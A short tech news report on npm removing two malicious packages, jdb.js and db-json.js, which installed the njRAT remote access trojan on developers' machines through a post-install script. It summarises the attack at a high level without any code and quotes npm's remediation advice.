The "npm" repository security team for JavaScript libraries removed two npm packages for containing malicious code that installed a remote access trojan (RAT) on the computers of developers working on JavaScript projects. The two packages; jdb.js and db-json.js., and both were created by the same author and described themselves as tools to help developers work with JSON files typically generated by database applications.
Both the packages were uploaded on the npm package registry last week and were downloaded more than 100 times before their malicious behaviour was detected by Sonatype, a company that scans package repositories on a regular basis.
According to Sonatype's Ax Sharma, the two packages contained a malicious script that executed after web developers imported and installed any of the two malicious libraries.
The post-install script performed basic reconnaissance of the infected host and then attempted to download and run a file named patch.exe (VT scan) that later installed njRAT, aka Bladabindi, a very popular remote access trojan that has been used in espionage and data theft operations since 2015.
To make sure the njRAT download would be free from any issues, the patch.exe loader also modified the local Windows firewall to add a rule to whitelist its command and control (C&C) server before pinging back its operator and initiating the RAT download, said Sharma.
All of this behaviour was contained only in the jdb.js package, while the second package, db-json.js, loaded the first in an attempt to disguise its malicious behaviour.
Since infections with any type of RAT-like malware are considered severe incidents, in security alerts on Monday, the npm security team advised web developers to consider their systems as fully compromised, if they installed any of the two packages.
"Any computer that has this package installed or running should be considered fully compromised," the npm team said.
"All secrets and keys stored on that computer should be rotated immediately from a different computer.
"The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it," they also added.
See What’s Next in Tech With the Fast Forward Newsletter
Tweets From @varindiamag
Nothing to see here - yet
When they Tweet, their Tweets will show up here.